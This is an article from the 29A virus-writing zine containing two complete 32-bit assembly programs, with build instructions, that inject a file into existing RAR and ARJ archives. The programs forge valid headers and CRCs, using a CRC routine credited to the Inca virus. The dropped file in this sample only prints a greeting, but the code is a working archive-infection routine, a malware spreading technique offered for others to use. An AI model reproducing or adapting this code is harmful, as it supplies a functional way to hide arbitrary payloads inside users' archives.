Copy Link
Add to Bookmark
Report
29A Issue 03 02 01
; FOLLOWING THESE LINES ARE GOING TWO 32 BITS PROGRAMS, ONE OF
; THEM IS A RAR DROPER, THE SECOND ONE IS AN ARJ DROPPER. ENJOY!
;
; CD13
; Paraguay, October 28, 1998
;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ßÛßßßÜ ÜÛßÛÜßÛßßßÜ ßßßÜ ßßßÜ ßÛßßÜ ßÛßßßÜ ÜßßßÜ ßÛßßßÜ Üßßß ßÛßßßÜ
; Û Û Û Û Û Û Û ÜÜß Û Û Û Û Û Û Û Û ÛÜÜ Û Û
; ÛÜÜÛ ÛÜÜÜÛ ÛÜÜÛ ßßÛ Û Û Û ÛÜÜÛ Û Û Ûßßß Û ÛÜÜÛ
; Û Û Û Û Û Û ÜÜÜß ßÜÜÜ ÜÛÜÜß Û Û ßÜÜÜß Û ßÜÜÜ Û Û
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[ by Int13h/IKX ]ÄÄÄÄÄ
;
; This program drops a file over a RAR archive. I translated to 32 bits
; the routine used in Star0's tutorial on archives. 100% API based.
;Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä
;
; Yes, nihil assembler maius:
; tasm /ml /m3 rar32,,;
; tlink32 -Tpe -c -v rar32,rar32,, import32.lib
;
.386
.model flat
locals
HeaderSize equ FinRARHeader-RARHeader
Size equ 53 ; # of bytes of the hoste
extrn ExitProcess:PROC
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn SetFilePointer:PROC
extrn CloseHandle:PROC
.DATA
Proggy db 0b4h,009h,0bah,009h,001h,0cdh,021h,0cdh,020h,00ah,00dh,049h
db 06eh,074h,065h,072h,06eh,061h,074h,069h,06fh,06eh,061h,06ch
db 020h,04bh,06eh,06fh,077h,06ch,065h,064h,067h,065h,020h,065h
db 058h,063h,068h,061h,06eh,067h,065h,020h,072h,075h,06ch,065h
db 073h,021h,00ah,00dh,024h ; Program that shows a text
Number dd 0
FileHandle dd 0
Archivo db 'TEST.RAR',0 ; Test with this file
RARHeader: ; Header that we will add
RARHeaderCRC dw 0 ; We'll fill: CRC of header
RARType db 074h ; File Header
RARFlags dw 8000h
RARHeadsize dw HeaderSize
RARCompressed dd Size ; Compressed and Original
RAROriginal dd Size ; size are the same, we stored
RAROs db 0 ; OS: ms-dos
RARCrc32 dd 0 ; We must fill this field
RARFileTime db 063h,078h ; Time of the program
RARFileDate db 031h,024h ; Date of the proggy
RARNeedVer db 014h
RARMethod db 030h ; Method: storing
RARFnameSize dw FinRARHeader-RARName
RARAttrib dd 0
RARName db "CD13.COM" ; Name of file to drop
FinRARHeader label byte
.CODE
INICIO: push large 00
push large 00000080h
push large 03
push large 00
push large 00
push 0c0000000h
push offset Archivo ; Open the RAR file
call CreateFileA
mov dword ptr [FileHandle],eax
push 02
push 00
push 00 ; Move pointer to EOF
push eax
call SetFilePointer
mov esi,offset Proggy
mov edi,Size ; Get CRC32 of the program
call CRC32 ; that we'll drop
mov dword ptr [RARCrc32],eax ; Save the CRC
mov esi,offset RARHeader+2
mov edi,HeaderSize-2
call CRC32 ; Get CRC32 of the header
mov word ptr [RARHeaderCRC],ax
push 0
push offset Number ; Number of bytes written
push HeaderSize
push offset RARHeader ; Write the header
push dword ptr [FileHandle]
call WriteFile
mov word ptr [RARHeaderCRC],0
mov word ptr [RARCrc32],0 ; Blank these fields
mov word ptr [RARCrc32+2],0
push 0
push offset Number
push Size
push offset Proggy ; Drop the file
push dword ptr [FileHandle]
call WriteFile
push dword ptr [FileHandle] ; Close it
call CloseHandle
Salida: push 0
call ExitProcess
CRC32: cld ; Routine extracted from Vecna's
push ebx ; Inca virus! Muito brigado, friend!
mov ecx,-1 ; Calculates CRC32 at runtime, no
mov edx,ecx ; need of big tables.
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0edb8h
NoCRC: dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec di
jnz NextByteCRC
not edx
not ecx
pop ebx
mov eax,edx
rol eax,16
mov ax,cx
ret
Final label byte
Ends
End INICIO
----------------------------------------------------------------------------
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÜÛßÛÜßÛßßßÜ ßßßÛß ßßßÜ ßßßÜ ßÛßßÜ ßÛßßßÜ ÜßßßÜ ßÛßßßÜ Üßßß ßÛßßßÜ
; Û Û Û Û Û Û ÜÜß Û Û Û Û Û Û Û Û ÛÜÜ Û Û
; ÛÜÜÜÛ ÛÜÜÛ Û ßßÛ Û Û Û ÛÜÜÛ Û Û Ûßßß Û ÛÜÜÛ
; Û Û Û Û ßÜÜß ÜÜÜß ßÜÜÜ ÜÛÜÜß Û Û ßÜÜÜß Û ßÜÜÜ Û Û
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[ by Int13h/IKX ]ÄÄÄÄÄ
;
; This program drops a file over a ARJ archive. I translated to 32 bits
; the routine used in Star0's tutorial on archives. 100% API based.
;Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä
;
; Yes, nihil assembler maius:
; tasm /ml /m3 arj32,,;
; tlink32 -Tpe -c -v arj32,arj32,, import32.lib
;
.386
.model flat
locals
Size equ 53 ; # of bytes of the hoste
extrn ExitProcess:PROC
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn SetFilePointer:PROC
extrn CloseHandle:PROC
.DATA
Proggy db 0b4h,009h,0bah,009h,001h,0cdh,021h,0cdh,020h,00ah,00dh,049h
db 06eh,074h,065h,072h,06eh,061h,074h,069h,06fh,06eh,061h,06ch
db 020h,04bh,06eh,06fh,077h,06ch,065h,064h,067h,065h,020h,065h
db 058h,063h,068h,061h,06eh,067h,065h,020h,072h,075h,06ch,065h
db 073h,021h,00ah,00dh,024h ; Program that shows a text
HeaderARJ:
ARJSig db 60h,0eah ; ARJ signature
ARJHeadsiz dw 28h ; Header size
ARJHSmsize db 01eh ; Internal header size
ARJVer db 07h ; Ver made by
ARJMin db 01h ; Minimum version to extract
ARJHost db 0h ; Host Operating System
ARJFlags db 10h ; Flags = path translated
ARJMethod db 0h ; Method = 0 = stored
ARJFiletype db 0h ; File type = 0 = binary
ARJReserved db 'Z' ; reserved
ARJFileTime db 063h,078h ; Time
ARJFileDate db 031h,024h ; Date
ARJCompress dd Size ; size compressed = uncompress.
ARJOriginal dd Size ; size uncompressed = compress.
ARJCRC32 dd 0 ; CRC of The file
ARJEntryName dw 0
ARJAttribute dw 0 ; Attribute
ARJHostData dw 0
SecondSide:
ARJFilename db 'CD13.COM',0 ; FileName with Null-End
ARJComment db 0 ; Comment with Null-End
ARJHeaderCRC dd 0 ; Header CRC32
ARJExtended dw 0 ; Extended Header - Unused
FinSide:
Number dd 0
FileHandle dd 0
Archivo db 'TEST.ARJ',0 ; Test with this file
.CODE
INICIO: push large 00
push large 00000080h
push large 03
push large 00
push large 00
push 0c0000000h
push offset Archivo ; Open the ARJ file
call CreateFileA
mov dword ptr [FileHandle],eax
push 02
push 00
push 00 ; Move pointer to EOF
push eax
call SetFilePointer
xchg ecx,edx ; sub cx/dx(32 bits) 4
mov edx,eax
sub edx,4
sbb ecx,1
add ecx,1
push 00 ; From file beggining
push 00
push edx ; Move pointer there
push dword ptr [FileHandle]
call SetFilePointer
mov esi,offset Proggy
mov edi,Size ; Get CRC32 of the program
call CRC32 ; that we'll drop
mov dword ptr [ARJCRC32],eax ; Save the CRC
push 0
push offset Number ; Number of bytes written
push SecondSide-HeaderARJ
push offset HeaderARJ ; Write the header
push dword ptr [FileHandle]
call WriteFile
mov esi,offset ARJHSmsize
mov edi,ARJHeaderCRC-ARJHSmsize
call CRC32
mov dword ptr [ARJHeaderCRC],eax
push 0
push offset Number ; Number of bytes written
push FinSide-SecondSide
push offset SecondSide ; Write the header
push dword ptr [FileHandle]
call WriteFile
mov dword ptr [ARJHeaderCRC],0
mov dword ptr [ARJCRC32],0
push 0
push offset Number ; Number of bytes written
push Size
push offset Proggy ; Drop it!
push dword ptr [FileHandle]
call WriteFile
mov word ptr [ARJHeadsiz],0
push 0
push offset Number ; Number of bytes written
push 4
push offset HeaderARJ ; Write 4 bytes
push dword ptr [FileHandle]
call WriteFile
push dword ptr [FileHandle] ; Close it
call CloseHandle
Salida: push 0
call ExitProcess
CRC32: cld ; Routine extracted from Vecna's
push ebx ; Inca virus! Muito brigado, friend!
mov ecx,-1 ; Calculates CRC32 at runtime, no
mov edx,ecx ; need of big tables.
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0edb8h
NoCRC: dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec di
jnz NextByteCRC
not edx
not ecx
pop ebx
mov eax,edx
rol eax,16
mov ax,cx
ret
Final label byte
Ends
End INICIO
